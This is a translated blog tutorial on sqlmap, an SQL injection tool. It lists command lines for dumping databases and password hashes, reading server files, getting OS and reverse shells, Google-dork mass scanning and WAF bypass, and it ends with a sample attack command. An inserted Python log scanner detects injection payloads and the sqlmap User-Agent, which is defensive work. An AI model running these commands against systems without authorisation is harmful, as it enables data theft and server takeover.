SQL injection series: a detailed look at the injection tool sqlmap

About sqlmap

sqlmap is an open source penetration testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers. It comes with a powerful detection engine, many niche features for the professional penetration tester, and a broad range of switches that cover database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system through out-of-band connections.

sqlmap function

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Vertica, Mckoi and Presto database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support for connecting directly to the database, without going through a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support for enumerating users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them with a dictionary-based attack.
  • Support for dumping database tables entirely, a range of entries, or specific columns, as the user chooses. The user can also choose to dump only a range of characters from each column's entries.
  • Support for searching for specific database names, for specific tables across all databases, or for specific columns across all databases' tables. This is useful, for example, to identify tables containing custom application credentials whose relevant column names contain strings such as name and pass.
  • Support for downloading and uploading any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support for executing arbitrary commands on the database server's underlying operating system and retrieving their standard output when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support for establishing an out-of-band stateful TCP connection between the attacker's machine and the database server's underlying operating system. The channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as the user chooses.
  • Support for privilege escalation of the database process user via Metasploit's Meterpreter getsystem command.

sqlmap installation

Download the installation package: https://pypi.org/project/sqlmap/#files

1. Extract the downloaded package to the root of the C: drive.

2. Open the extracted folder and note its path.

3. Add that path to the system PATH environment variable.

4. Open a cmd terminal and type sqlmap.py to confirm the tool runs.

Use sqlmap

Access to basic content

sqlmap -u "http://url/news?id=1" --current-user # Get the current user name

sqlmap -u "http://www.xxoo.com/news?id=1" --current-db # Get the current database name

sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" # List the tables in the database

sqlmap -u "http://url/news?id=1" --columns -T "tablename" -D "db_name" -v 0 # List the columns of the table

sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 # Dump the contents of the column

Retrieving important information

sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # --dbms specifies the database type

sqlmap -u "http://url/news?id=1" --users # List database users

sqlmap -u "http://url/news?id=1" --dbs # List databases

sqlmap -u "http://url/news?id=1" --passwords # Database user password hashes

sqlmap -u "http://url/news?id=1" --passwords -U root -v 0 # Password hash of the specified database user

sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 # Dump the specified columns, entries 1 to 20

sqlmap -u "http://url/news?id=1" --dump-all -v 0 # Dump all tables of all databases

sqlmap -u "http://url/news?id=1" --privileges # View privileges

sqlmap -u "http://url/news?id=1" --privileges -U root # View the privileges of the specified user

sqlmap -u "http://url/news?id=1" --is-dba -v 1 # Whether the current user is a database administrator

sqlmap -u "http://url/news?id=1" --roles # Enumerate database user roles

sqlmap -u "http://url/news?id=1" --udf-inject # Inject user-defined functions (used to obtain system privileges)

sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 # Dump all tables, excluding the system databases

sqlmap -u "http://url/news?id=1" --union-cols # UNION query of table records

sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" # Cookie injection

sqlmap -u "http://url/news?id=1" -b # Get the banner information

sqlmap -u "http://url/news?id=1" --data "id=3" # POST injection

sqlmap -u "http://url/news?id=1" -v 1 -f # Fingerprint the database type

sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118" # Inject through a proxy

sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE" # Specify the string that marks a true page

sqlmap -u "http://url/news?id=1" --sql-shell # Execute specified SQL commands

sqlmap -u "http://url/news?id=1" --file /etc/passwd # Read a file from the database server's file system

sqlmap -u "http://url/news?id=1" --os-cmd=whoami # Execute a system command

sqlmap -u "http://url/news?id=1" --os-shell # Interactive system shell

sqlmap -u "http://url/news?id=1" --os-pwn # Reverse shell

sqlmap -u "http://url/news?id=1" --reg-read # Read the Windows registry

sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" # Save progress

sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume # Resume saved progress

Advanced Usage

-p name: when the request carries several parameters, for example index.php?n_id=1&name=2&data=2020, -p selects the parameter to inject (here name).

sqlmap -g "google dork" --dump-all --batch # Search Google for injection points and dump all fields automatically; requires normal access to google.com

--technique: specify the injection technique(s) to test and use.

With no argument, all injection techniques are tested by default.

• B: Boolean-based blind SQL injection

• E: Error-based SQL injection

• U: UNION query-based SQL injection

• S: Stacked queries SQL injection

• T: Time-based blind SQL injection
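As an added illustration from the defender's side (this is not code from the original post or from sqlmap itself): a small Python scanner that reads Apache combined-format access-log lines, URL-decodes the request path, tags each request with the technique letter (B, E, U, S, T) whose payload pattern it matches, and also flags sqlmap's default User-Agent. The log lines and the User-Agent string are constructed samples, and the signatures are my own assumptions that catch plain payloads, not tamper-encoded ones.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not real traffic); line 2 carries a sqlmap-style UA.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2020:12:00:01 +0000] "GET /news?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2020:12:00:02 +0000] "GET /news?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.4 (http://sqlmap.org)"
10.0.0.7 - - [10/Feb/2020:12:00:03 +0000] "GET /news?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Feb/2020:12:00:04 +0000] "GET /news?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Feb/2020:12:00:05 +0000] "GET /news?id=2 HTTP/1.1" 200 520 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumed payload signatures, keyed by the technique letters that --technique uses.
TECHNIQUE_SIGS = [
    ("B", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),                        # boolean-based blind
    ("E", re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)),                   # error-based (MySQL)
    ("U", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),                       # UNION query
    ("S", re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I)),          # stacked queries
    ("T", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)),  # time-based blind
]

def classify(line):
    """Return a finding dict for one log line, or None when it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))       # normalise %20, %3D, + before matching
    techniques = [t for t, rx in TECHNIQUE_SIGS if rx.search(decoded)]
    ua_sqlmap = "sqlmap" in m.group("ua").lower()  # default UA; absent if --random-agent was used
    if not techniques and not ua_sqlmap:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
            "path": decoded, "ua_sqlmap": ua_sqlmap, "techniques": techniques}

def scan_log(text):
    """Classify every line and return the findings in log order."""
    return [f for f in (classify(l) for l in text.splitlines()) if f]

def flagged_ips(text):
    """Count findings per source IP so a probing burst from one host stands out."""
    counts = {}
    for f in scan_log(text):
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts
```

On the sample, three of the five requests are flagged and all come from 10.0.0.7, which is the kind of per-host burst that distinguishes a scan from a stray request.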

--tamper: bypass a web application firewall (WAF) by encoding the payload; by default sqlmap encodes with char().

sqlmap -u "http://url/news?id=1" --smart --level 3 --users # --smart runs thorough tests only on positive heuristics; --level sets the test level

Attack example:

sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --passwords


Source: blog.csdn.net/weixin_45728976/article/details/104081399